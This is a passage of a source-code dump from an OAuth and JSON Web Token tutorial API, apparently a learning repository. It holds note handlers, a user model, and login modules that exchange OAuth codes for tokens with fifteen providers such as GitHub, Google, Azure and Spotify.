'setup/helpers/validation' 5 | import { AuthError, ValidationError } from 'modules/common/errors' 6 | import Note from 'modules/note/model' 7 | 8 | // Save 9 | export default async function save({ params: { text }, auth }) { 10 | if (authCheck(auth)) { 11 | // Validation rules 12 | const rules = [ 13 | { 14 | data: { value: text }, 15 | check: 'isNotEmpty', 16 | message: 'Invalid text.', 17 | }, 18 | ] 19 | 20 | // Validate 21 | try { 22 | v.validate(rules) 23 | } catch (error) { 24 | throw new ValidationError(error.message) 25 | } 26 | 27 | try { 28 | const fields = { userId: auth.user._id, text } 29 | 30 | // Note 31 | const data = await Note.create({ 32 | ...fields, 33 | isDeleted: false, 34 | }) 35 | 36 | return { 37 | data, 38 | message: `Note has been saved successfully.`, 39 | } 40 | } catch (error) { 41 | throw new Error(`An error occurred. ${error.message}`) 42 | } 43 | } 44 | 45 | throw new AuthError('You are not authorized to perform this action.') 46 | } 47 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/query/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import noteList from './list' 3 | 4 | // Queries 5 | export default { 6 | noteList, 7 | } 8 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/query/list.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import { authCheck } from 'setup/helpers/utils' 3 | import { AuthError } from 'modules/common/errors' 4 | import Note from 'modules/note/model' 5 | 6 | // List 7 | export default async function list({ auth }) { 8 | if (authCheck(auth)) { 9 | try { 10 | // Note 11 | const data = await Note.find({ 12 | userId: auth.user._id, 13 | isDeleted: false, 14 | }).sort({ createdAt: -1 }) 15 | 16 | return { 17 | data, 18 | } 19 | } catch (error) { 20 | throw new Error(`An error occurred. ${error.message}`) 21 | } 22 | } 23 | 24 | throw new AuthError('You are not authorized to perform this action.') 25 | } 26 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import query from './query' 3 | import mutation from './mutation' 4 | 5 | export default { 6 | ...query, 7 | ...mutation, 8 | } 9 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/model.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import mongoose, { Schema } from 'mongoose' 3 | 4 | // Collection name 5 | export const collection = 'User' 6 | 7 | // Schema 8 | const schema = new Schema( 9 | { 10 | email: { 11 | type: String, 12 | required: true, 13 | unique: true, 14 | index: true, 15 | }, 16 | 17 | password: { 18 | type: String, 19 | required: true, 20 | }, 21 | 22 | name: { 23 | type: String, 24 | required: true, 25 | }, 26 | }, 27 | { timestamps: true }, 28 | ) 29 | 30 | // Model 31 | export default mongoose.model(collection, schema, collection) 32 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/azure.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_AZURE_ID, 7 | OAUTH_AZURE_SECRET, 8 | OAUTH_AZURE_TENANT, 9 | URL_WEB, 10 | } from 'setup/config/env' 11 | import params from 'setup/config/params' 12 | 13 | // azure 14 | export default async function azure({ code }) { 15 | let userProvider 16 | 17 | // 1. access_token account using OAuth code 18 | const form = new URLSearchParams() 19 | form.append('client_id', OAUTH_AZURE_ID) 20 | form.append('client_secret', OAUTH_AZURE_SECRET) 21 | form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) 22 | form.append('grant_type', `authorization_code`) 23 | form.append( 24 | 'scope', 25 | [ 26 | 'offline_access', 27 | 'openid', 28 | 'email', 29 | 'profile', 30 | 'https://graph.microsoft.com/user.read', 31 | ].join(' '), 32 | ) 33 | form.append('code', code) 34 | 35 | const access = await axios({ 36 | url: `https://login.microsoftonline.com/${OAUTH_AZURE_TENANT}/oauth2/v2.0/token`, 37 | method: 'post', 38 | data: form, 39 | }) 40 | 41 | // 2. get user details 42 | if (access.data && access.data.access_token) { 43 | const me = await axios({ 44 | url: 'https://graph.microsoft.com/v1.0/me', 45 | method: 'get', 46 | headers: { 47 | 'content-type': 'application/json', 48 | Authorization: `Bearer ${access.data.access_token}`, 49 | }, 50 | }) 51 | 52 | if (me.data && me.data.id) { 53 | userProvider = { 54 | email: me.data.userPrincipalName, 55 | name: me.data.displayName, 56 | } 57 | } 58 | } 59 | 60 | return userProvider 61 | } 62 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/bitbucket.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_BITBUCKET_ID, OAUTH_BITBUCKET_SECRET } from 'setup/config/env' 6 | 7 | // bitbucket 8 | export default async function bitbucket({ code }) { 9 | let userProvider 10 | 11 | // 1. get access_token account using OAuth code 12 | const form = new URLSearchParams() 13 | form.append('grant_type', 'authorization_code') 14 | form.append('code', code) 15 | const access = await axios({ 16 | url: 'https://bitbucket.org/site/oauth2/access_token', 17 | method: 'post', 18 | data: form, 19 | auth: { 20 | username: OAUTH_BITBUCKET_ID, 21 | password: OAUTH_BITBUCKET_SECRET, 22 | }, 23 | }) 24 | 25 | // 2. get user details 26 | if (access.data && access.data.access_token) { 27 | const me = await axios({ 28 | url: 'https://api.bitbucket.org/2.0/user', 29 | method: 'get', 30 | headers: { 31 | 'content-type': 'application/json', 32 | Authorization: `Bearer ${access.data.access_token}`, 33 | }, 34 | }) 35 | 36 | if (me.data && me.data) { 37 | // 3. get user emails 38 | const emails = await axios({ 39 | url: 'https://api.bitbucket.org/2.0/user/emails', 40 | method: 'get', 41 | headers: { 42 | 'content-type': 'application/json', 43 | Authorization: `Bearer ${access.data.access_token}`, 44 | }, 45 | }) 46 | 47 | if (emails && emails.data) { 48 | userProvider = { 49 | email: emails.data.values[0].email, 50 | name: me.data.display_name, 51 | } 52 | } 53 | } 54 | } 55 | 56 | return userProvider 57 | } 58 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/digitalocean.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_DIGITALOCEAN_ID, 7 | OAUTH_DIGITALOCEAN_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // digitalocean 13 | export default async function digitalocean({ code }) { 14 | let userProvider 15 | 16 | // 1. get access_token account using OAuth code 17 | const access = await axios({ 18 | url: 'https://cloud.digitalocean.com/v1/oauth/token', 19 | method: 'post', 20 | headers: { accept: 'application/json' }, 21 | params: { 22 | client_id: OAUTH_DIGITALOCEAN_ID, 23 | client_secret: OAUTH_DIGITALOCEAN_SECRET, 24 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 25 | grant_type: 'authorization_code', 26 | code, 27 | }, 28 | }) 29 | 30 | // 2. get user details 31 | if (access.data && access.data.access_token) { 32 | const me = await axios({ 33 | url: 'https://api.digitalocean.com/v2/account', 34 | method: 'get', 35 | headers: { 36 | 'content-type': 'application/json', 37 | Authorization: `Bearer ${access.data.access_token}`, 38 | }, 39 | }) 40 | 41 | if (me.data && me.data.account) { 42 | userProvider = { 43 | email: me.data.account.email, 44 | name: access.data.info.name, 45 | } 46 | } 47 | } 48 | 49 | return userProvider 50 | } 51 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/discord.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_DISCORD_ID, 7 | OAUTH_DISCORD_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // discord 13 | export default async function discord({ code }) { 14 | let userProvider 15 | 16 | // 1. access_token account using OAuth code 17 | const form = new URLSearchParams() 18 | form.append('client_id', OAUTH_DISCORD_ID) 19 | form.append('client_secret', OAUTH_DISCORD_SECRET) 20 | form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) 21 | form.append('grant_type', `authorization_code`) 22 | form.append('scope', `identify email`) 23 | form.append('code', code) 24 | 25 | const access = await axios({ 26 | url: 'https://discordapp.com/api/oauth2/token', 27 | method: 'post', 28 | data: form, 29 | }) 30 | 31 | // 2. get user details 32 | if (access.data && access.data.access_token) { 33 | const me = await axios({ 34 | url: 'https://discordapp.com/api/users/@me', 35 | method: 'get', 36 | headers: { 37 | 'content-type': 'application/json', 38 | Authorization: `Bearer ${access.data.access_token}`, 39 | }, 40 | }) 41 | 42 | if (me.data && me.data.id) { 43 | userProvider = { 44 | email: me.data.email, 45 | name: me.data.username, 46 | } 47 | } 48 | } 49 | 50 | return userProvider 51 | } 52 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/facebook.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_FACEBOOK_ID, 7 | OAUTH_FACEBOOK_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // facebook 13 | export default async function facebook({ code }) { 14 | let userProvider 15 | 16 | // 1. get access_token account using OAuth code 17 | const access = await axios({ 18 | url: 'https://graph.facebook.com/v6.0/oauth/access_token', 19 | method: 'get', 20 | params: { 21 | client_id: OAUTH_FACEBOOK_ID, 22 | client_secret: OAUTH_FACEBOOK_SECRET, 23 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 24 | code, 25 | }, 26 | }) 27 | 28 | // 2. get user details 29 | if (access.data && access.data.access_token) { 30 | const me = await axios({ 31 | url: 'https://graph.facebook.com/me', 32 | method: 'get', 33 | params: { 34 | fields: ['id', 'email', 'name'].join(','), 35 | access_token: access.data.access_token, 36 | }, 37 | }) 38 | 39 | if (me.data && me.data.id) { 40 | userProvider = { 41 | email: me.data.email, 42 | name: me.data.name, 43 | } 44 | } 45 | } 46 | 47 | return userProvider 48 | } 49 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/github.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_GITHUB_ID, OAUTH_GITHUB_SECRET, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // github 9 | export default async function github({ code }) { 10 | let userProvider 11 | 12 | // 1. get access_token account using OAuth code 13 | const access = await axios({ 14 | url: 'https://github.com/login/oauth/access_token', 15 | method: 'get', 16 | headers: { accept: 'application/json' }, 17 | params: { 18 | client_id: OAUTH_GITHUB_ID, 19 | client_secret: OAUTH_GITHUB_SECRET, 20 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 21 | code, 22 | }, 23 | }) 24 | 25 | // 2. get user details 26 | if (access.data && access.data.access_token) { 27 | const me = await axios({ 28 | url: 'https://api.github.com/user', 29 | method: 'get', 30 | headers: { 31 | 'content-type': 'application/json', 32 | Authorization: `token ${access.data.access_token}`, 33 | }, 34 | }) 35 | 36 | if (me.data && me.data.id) { 37 | userProvider = { 38 | email: me.data.email, 39 | name: me.data.name, 40 | } 41 | } 42 | } 43 | 44 | return userProvider 45 | } 46 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/gitlab.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_GITLAB_ID, OAUTH_GITLAB_SECRET, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // gitlab 9 | export default async function gitlab({ code }) { 10 | let userProvider 11 | 12 | // 1. get access_token account using OAuth code 13 | const access = await axios({ 14 | url: `https://gitlab.com/oauth/token`, 15 | method: 'post', 16 | params: { 17 | client_id: OAUTH_GITLAB_ID, 18 | client_secret: OAUTH_GITLAB_SECRET, 19 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 20 | grant_type: 'authorization_code', 21 | code, 22 | }, 23 | }) 24 | 25 | // 2. get user details 26 | if (access.data && access.data.access_token) { 27 | const me = await axios({ 28 | url: 'https://gitlab.com/api/v4/user', 29 | method: 'get', 30 | headers: { 31 | 'content-type': 'application/json', 32 | Authorization: `Bearer ${access.data.access_token}`, 33 | }, 34 | }) 35 | 36 | if (me.data && me.data.id) { 37 | userProvider = { 38 | email: me.data.email, 39 | name: me.data.name, 40 | } 41 | } 42 | } 43 | 44 | return userProvider 45 | } 46 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/google.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_GOOGLE_ID, OAUTH_GOOGLE_SECRET, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // google 9 | export default async function google({ code }) { 10 | let userProvider 11 | 12 | // 1. get access_token account using OAuth code 13 | const access = await axios({ 14 | url: `https://oauth2.googleapis.com/token`, 15 | method: 'post', 16 | data: { 17 | client_id: OAUTH_GOOGLE_ID, 18 | client_secret: OAUTH_GOOGLE_SECRET, 19 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 20 | grant_type: 'authorization_code', 21 | code, 22 | }, 23 | }) 24 | 25 | // 2. get user details 26 | if (access.data && access.data.access_token) { 27 | const me = await axios({ 28 | url: 'https://www.googleapis.com/oauth2/v2/userinfo', 29 | method: 'get', 30 | headers: { 31 | Authorization: `Bearer ${access.data.access_token}`, 32 | }, 33 | }) 34 | 35 | if (me.data && me.data.id) { 36 | userProvider = { 37 | email: me.data.email, 38 | name: me.data.name, 39 | } 40 | } 41 | } 42 | 43 | return userProvider 44 | } 45 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/instagram.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_INSTAGRAM_ID, 7 | OAUTH_INSTAGRAM_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // instagram 13 | export default async function instagram({ code }) { 14 | let userProvider 15 | 16 | // 1. get (short lived) access_token account using OAuth code 17 | const form = new URLSearchParams() 18 | form.append('client_id', OAUTH_INSTAGRAM_ID) 19 | form.append('client_secret', OAUTH_INSTAGRAM_SECRET) 20 | // form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) // live 21 | form.append( 22 | 'redirect_uri', 23 | `https://example.com/${params.user.oauth.redirectUri}`, 24 | ) // test 25 | form.append('grant_type', `authorization_code`) 26 | form.append('code', code) 27 | 28 | const short = await axios({ 29 | url: 'https://api.instagram.com/oauth/access_token', 30 | method: 'post', 31 | data: form, 32 | }) 33 | 34 | // 2. get (long lived) access_token account using OAuth code 35 | if (short.data && short.data.access_token) { 36 | const long = await axios({ 37 | url: 'https://graph.instagram.com/access_token', 38 | method: 'get', 39 | params: { 40 | grant_type: 'ig_exchange_token', 41 | client_secret: OAUTH_INSTAGRAM_SECRET, 42 | access_token: short.data.access_token, 43 | }, 44 | }) 45 | 46 | // 3. get user details 47 | const me = await axios({ 48 | url: 'https://graph.instagram.com/me', 49 | method: 'get', 50 | params: { 51 | fields: ['id', 'username', 'account_type', 'media_count'].join(','), 52 | client_secret: OAUTH_INSTAGRAM_SECRET, 53 | access_token: long.data.access_token, 54 | }, 55 | }) 56 | 57 | if (me.data && me.data.id) { 58 | userProvider = { 59 | email: `${me.data.username}@instagram.com`, // Instagram does not return `email` field 60 | name: me.data.username, 61 | } 62 | } 63 | } 64 | 65 | return userProvider 66 | } 67 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/linkedin.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_LINKEDIN_ID, 7 | OAUTH_LINKEDIN_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // linkedin 13 | export default async function linkedin({ code }) { 14 | let userProvider 15 | 16 | // 1. access_token account using OAuth code 17 | const form = new URLSearchParams() 18 | form.append('client_id', OAUTH_LINKEDIN_ID) 19 | form.append('client_secret', OAUTH_LINKEDIN_SECRET) 20 | form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) 21 | form.append('grant_type', `authorization_code`) 22 | form.append('code', code) 23 | 24 | const access = await axios({ 25 | url: `https://www.linkedin.com/oauth/v2/accessToken`, 26 | method: 'post', 27 | data: form, 28 | }) 29 | 30 | // 2. get user details 31 | if (access.data && access.data.access_token) { 32 | const me = await axios({ 33 | url: 'https://api.linkedin.com/v2/me', 34 | method: 'get', 35 | headers: { 36 | 'content-type': 'application/json', 37 | Authorization: `Bearer ${access.data.access_token}`, 38 | }, 39 | }) 40 | 41 | const meEmail = await axios({ 42 | url: 43 | 'https://api.linkedin.com/v2/clientAwareMemberHandles?q=members&projection=(elements*(primary,type,handle~))', 44 | method: 'get', 45 | headers: { 46 | 'content-type': 'application/json', 47 | Authorization: `Bearer ${access.data.access_token}`, 48 | }, 49 | }) 50 | 51 | if (me.data && meEmail.data) { 52 | userProvider = { 53 | email: meEmail.data.elements[0]['handle~'].emailAddress, 54 | name: `${me.data.localizedFirstName} ${me.data.localizedLastName}`, 55 | } 56 | } 57 | } 58 | 59 | return userProvider 60 | } 61 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/reddit.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_REDDIT_ID, OAUTH_REDDIT_SECRET, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // reddit 9 | export default async function reddit({ code }) { 10 | let userProvider 11 | 12 | // 1. get access_token account using OAuth code 13 | const access = await axios({ 14 | url: 'https://www.reddit.com/api/v1/access_token', 15 | method: 'post', 16 | headers: { accept: 'application/json' }, 17 | auth: { 18 | username: OAUTH_REDDIT_ID, 19 | password: OAUTH_REDDIT_SECRET, 20 | }, 21 | params: { 22 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 23 | grant_type: 'authorization_code', 24 | code, 25 | }, 26 | }) 27 | 28 | // 2. get user details 29 | if (access.data && access.data.access_token) { 30 | const me = await axios({ 31 | url: 'https://oauth.reddit.com/api/v1/me', 32 | method: 'get', 33 | headers: { 34 | 'content-type': 'application/json', 35 | Authorization: `bearer ${access.data.access_token}`, 36 | }, 37 | }) 38 | 39 | if (me.data && me.data.name) { 40 | userProvider = { 41 | email: `${me.data.name}@reddit.com`, // Reddit does not return `email` field 42 | name: me.data.name, 43 | } 44 | } 45 | } 46 | 47 | return userProvider 48 | } 49 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/shopify.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_SHOPIFY_ID, 7 | OAUTH_SHOPIFY_SECRET, 8 | OAUTH_SHOPIFY_STORE, 9 | } from 'setup/config/env' 10 | 11 | // shopify 12 | export default async function shopify({ code }) { 13 | let userProvider 14 | 15 | // 1. access_token account using OAuth code 16 | const access = await axios({ 17 | url: `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/oauth/access_token`, 18 | method: 'post', 19 | params: { 20 | client_id: OAUTH_SHOPIFY_ID, 21 | client_secret: OAUTH_SHOPIFY_SECRET, 22 | code, 23 | }, 24 | }) 25 | 26 | // 2. get store details 27 | if (access.data && access.data.access_token) { 28 | const store = await axios({ 29 | url: `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/api/2020-04/shop.json`, 30 | method: 'get', 31 | headers: { 32 | 'content-type': 'application/json', 33 | 'X-Shopify-Access-Token': access.data.access_token, 34 | }, 35 | }) 36 | 37 | if (store.data && store.data && store.data.shop) { 38 | userProvider = { 39 | email: store.data.shop.email, 40 | name: store.data.shop.name, 41 | } 42 | } 43 | } 44 | 45 | return userProvider 46 | } 47 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/spotify.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { 6 | OAUTH_SPOTIFY_ID, 7 | OAUTH_SPOTIFY_SECRET, 8 | URL_WEB, 9 | } from 'setup/config/env' 10 | import params from 'setup/config/params' 11 | 12 | // spotify 13 | export default async function spotify({ code }) { 14 | let userProvider 15 | 16 | // 1. access_token account using OAuth code 17 | const access = await axios({ 18 | url: 'https://accounts.spotify.com/api/token', 19 | method: 'post', 20 | headers: { 21 | Authorization: `Basic ${Buffer.from( 22 | `${OAUTH_SPOTIFY_ID}:${OAUTH_SPOTIFY_SECRET}`, 23 | ).toString('base64')}`, 24 | }, 25 | params: { 26 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 27 | grant_type: `authorization_code`, 28 | code, 29 | }, 30 | }) 31 | 32 | // 2. get user details 33 | if (access.data && access.data.access_token) { 34 | const me = await axios({ 35 | url: 'https://api.spotify.com/v1/me', 36 | method: 'get', 37 | headers: { 38 | 'content-type': 'application/json', 39 | Authorization: `Bearer ${access.data.access_token}`, 40 | }, 41 | }) 42 | 43 | if (me.data && me.data.id) { 44 | userProvider = { 45 | email: me.data.email, 46 | name: me.data.display_name, 47 | } 48 | } 49 | } 50 | 51 | return userProvider 52 | } 53 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/twitter.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_TWITTER_ID, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // twitter 9 | export default async function twitter({ code }) { 10 | let userProvider 11 | 12 | // 1. access_token account using OAuth code 13 | const form = new URLSearchParams() 14 | form.append('client_id', OAUTH_TWITTER_ID) 15 | form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) 16 | form.append('grant_type', `authorization_code`) 17 | form.append('code_verifier', `code_challenge`) 18 | form.append('code', code) 19 | 20 | const access = await axios({ 21 | url: `https://api.twitter.com/2/oauth2/token`, 22 | method: 'post', 23 | data: form, 24 | }) 25 | 26 | // 2. get user details 27 | if (access.data && access.data.access_token) { 28 | const me = await axios({ 29 | url: 'https://api.twitter.com/2/users/me', 30 | method: 'get', 31 | headers: { 32 | 'content-type': 'application/json', 33 | Authorization: `Bearer ${access.data.access_token}`, 34 | }, 35 | }) 36 | 37 | if (me.data && me.data.data) { 38 | userProvider = { 39 | // since twitter does not return email, we construct a dummy email for database 40 | email: `${me.data.data.username}.${me.data.data.id}@example.com`, 41 | name: me.data.data.name, 42 | } 43 | } 44 | } 45 | 46 | return userProvider 47 | } 48 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/zoom.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { OAUTH_ZOOM_ID, OAUTH_ZOOM_SECRET, URL_WEB } from 'setup/config/env' 6 | import params from 'setup/config/params' 7 | 8 | // zoom 9 | export default async function zoom({ code }) { 10 | let userProvider 11 | 12 | // 1. get access_token account using OAuth code 13 | const access = await axios({ 14 | url: 'https://zoom.us/oauth/token', 15 | method: 'post', 16 | headers: { 17 | Authorization: `Basic ${Buffer.from( 18 | `${OAUTH_ZOOM_ID}:${OAUTH_ZOOM_SECRET}`, 19 | ).toString('base64')}`, 20 | }, 21 | params: { 22 | redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`, 23 | grant_type: `authorization_code`, 24 | code, 25 | }, 26 | }) 27 | 28 | // 2. get user details 29 | if (access.data && access.data.access_token) { 30 | const me = await axios({ 31 | url: 'https://api.zoom.us/v2/users/me', 32 | method: 'get', 33 | headers: { 34 | 'content-type': 'application/json', 35 | Authorization: `Bearer ${access.data.access_token}`, 36 | }, 37 | }) 38 | 39 | if (me.data && me.data.id) { 40 | userProvider = { 41 | email: me.data.email, 42 | name: `${me.data.first_name} ${me.data.last_name}`, 43 | } 44 | } 45 | } 46 | 47 | return userProvider 48 | } 49 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import userAuthorize from './authorize' 3 | 4 | // Mutations 5 | export default { 6 | userAuthorize, 7 | } 8 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/authResponse.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import jwt from 'jsonwebtoken' 3 | 4 | // App Imports 5 | import { SECURITY_SECRET } from 'setup/config/env' 6 | 7 | // Auth Response (token and user info) 8 | export default function userAuthResponse(user) { 9 | user = user.toJSON() 10 | 11 | delete user.password 12 | 13 | return { 14 | token: jwt.sign({ id: user._id }, SECURITY_SECRET), 15 | user, 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import userProfile from './profile' 3 | 4 | // Queries 5 | export default { 6 | userProfile, 7 | } 8 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/profile.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import { authCheck } from 'setup/helpers/utils' 3 | import { AuthError } from 'modules/common/errors' 4 | import User from 'modules/user/model' 5 | 6 | // Profile 7 | export default async function profile({ auth }) { 8 | console.log('auth', auth) 9 | if (authCheck(auth)) { 10 | try { 11 | // User 12 | const data = await User.findOne({ _id: auth.user._id }) 13 | 14 | return { 15 | data, 16 | } 17 | } catch (error) { 18 | throw new Error(`An error occurred. ${error.message}`) 19 | } 20 | } 21 | 22 | throw new AuthError('You are not authorized to perform this action.') 23 | } 24 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/config/params.js: -------------------------------------------------------------------------------- 1 | // Params 2 | export default { 3 | site: { 4 | name: 'OAuth', 5 | description: 'OAuth 2.0 examples for various providers in one place', 6 | author: 'Atul Yadav', 7 | url: 'https://github.com/atulmy/oauth', 8 | copyright: '© 2020', 9 | }, 10 | 11 | // common 12 | common: { 13 | endpoint: { 14 | url: '/:operation?', 15 | upload: '/upload', 16 | }, 17 | 18 | errors: { 19 | auth: 'error_auth', 20 | validation: 'error_validation', 21 | }, 22 | }, 23 | 24 | // user 25 | user: { 26 | oauth: { 27 | providers: { 28 | facebook: { 29 | key: 'facebook', 30 | title: 'Facebook', 31 | }, 32 | 33 | google: { 34 | key: 'google', 35 | title: 'Google', 36 | }, 37 | 38 | instagram: { 39 | key: 'instagram', 40 | title: 'Instagram', 41 | }, 42 | 43 | linkedin: { 44 | key: 'linkedin', 45 | title: 'LinkedIn', 46 | }, 47 | 48 | twitter: { 49 | key: 'twitter', 50 | title: 'Twitter', 51 | }, 52 | 53 | reddit: { 54 | key: 'reddit', 55 | title: 'Reddit', 56 | }, 57 | 58 | discord: { 59 | key: 'discord', 60 | title: 'Discord', 61 | }, 62 | 63 | zoom: { 64 | key: 'zoom', 65 | title: 'Zoom', 66 | }, 67 | 68 | github: { 69 | key: 'github', 70 | title: 'Github', 71 | }, 72 | 73 | gitlab: { 74 | key: 'gitlab', 75 | title: 'Gitlab', 76 | }, 77 | 78 | digitalocean: { 79 | key: 'digitalocean', 80 | title: 'DigitalOcean', 81 | }, 82 | 83 | bitbucket: { 84 | key: 'bitbucket', 85 | title: 'Bitbucket', 86 | }, 87 | 88 | azure: { 89 | key: 'azure', 90 | title: 'Azure', 91 | }, 92 | 93 | spotify: { 94 | key: 'spotify', 95 | title: 'Spotify', 96 | }, 97 | 98 | shopify: { 99 | key: 'shopify', 100 | title: 'Shopify', 101 | }, 102 | }, 103 | 104 | redirectUri: 'authorize/', 105 | }, 106 | }, 107 | } 108 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/helpers/utils.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import { ENV } from 'setup/config/env' 3 | 4 | // Utility functions 5 | 6 | // Check development env 7 | export function isDevelopment() { 8 | return ENV === 'development' 9 | } 10 | 11 | // Generate random number 12 | export function randomNumber(low, high) { 13 | return Math.floor(Math.random() * (high - low) + low) 14 | } 15 | 16 | // Auth check user 17 | export function authCheck(auth) { 18 | return auth && auth.user && auth.user._id 19 | } 20 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/helpers/validation.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import Validator from 'fullstack-validator' 3 | 4 | const v = new Validator(/* custom rules */) 5 | 6 | export default v 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/authentication.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import jwt from 'jsonwebtoken' 3 | 4 | // App Imports 5 | import { SECURITY_SECRET } from 'setup/config/env' 6 | import User from 'modules/user/model' 7 | 8 | // Authentication middleware 9 | export default async function (request, response, next) { 10 | let header = request.headers.authentication 11 